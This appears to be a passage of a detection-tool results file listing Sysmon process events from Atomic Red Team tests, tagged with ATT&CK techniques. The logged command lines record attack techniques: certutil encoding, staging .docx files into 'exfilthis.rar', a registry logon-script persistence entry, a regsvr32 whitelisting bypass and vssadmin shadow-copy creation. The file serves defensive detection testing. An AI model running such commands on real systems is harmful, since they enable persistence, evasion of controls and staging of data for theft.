+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.261</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00109E193C00</Data>
+    <Data Name=""ProcessId"">1260</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -encode c:\file.exe file.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
+    <Data Name=""ParentProcessId"">4832</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.235828Z"">
+    </TimeCreated>
+    <EventRecordID>4061</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.223</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
+    <Data Name=""ProcessId"">4832</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:54:16.830063Z"">
+    </TimeCreated>
+    <EventRecordID>4054</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:54:16.818</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D998-5D31-0000-00101BB73900</Data>
+    <Data Name=""ProcessId"">2424</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;rar a -r exfilthis.rar *.docx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:54:16.782667Z"">
+    </TimeCreated>
+    <EventRecordID>4053</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:54:16.766</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D998-5D31-0000-001008B43900</Data>
+    <Data Name=""ProcessId"">2000</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;rar a -r exfilthis.rar *.docx&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:54:01.955256Z"">
+    </TimeCreated>
+    <EventRecordID>4052</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:54:01.940</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D989-5D31-0000-0010FC7B3900</Data>
+    <Data Name=""ProcessId"">4944</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d &quot; cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:54.976854Z"">
+    </TimeCreated>
+    <EventRecordID>4049</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:54.968</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D982-5D31-0000-0010DC633900</Data>
+    <Data Name=""ProcessId"">4240</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d &quot; cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:47.239318Z"">
+    </TimeCreated>
+    <EventRecordID>4048</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:47.230</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-0010F0F03800</Data>
+    <Data Name=""ProcessId"">6888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline (  /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
+    </TimeCreated>
+    <EventRecordID>4047</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
+    <Data Name=""ProcessId"">5788</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
+    <Data Name=""ParentProcessId"">5828</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
+    </TimeCreated>
+    <EventRecordID>4047</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
+    <Data Name=""ProcessId"">5788</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
+    <Data Name=""ParentProcessId"">5828</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
+    </TimeCreated>
+    <EventRecordID>4047</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
+    <Data Name=""ProcessId"">5788</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
+    <Data Name=""ParentProcessId"">5828</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe create shadow /for=C:&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:26.971596Z"">
+    </TimeCreated>
+    <EventRecordID>4128</EventRecordID>
+    <Correlation>
+    </Correlation>
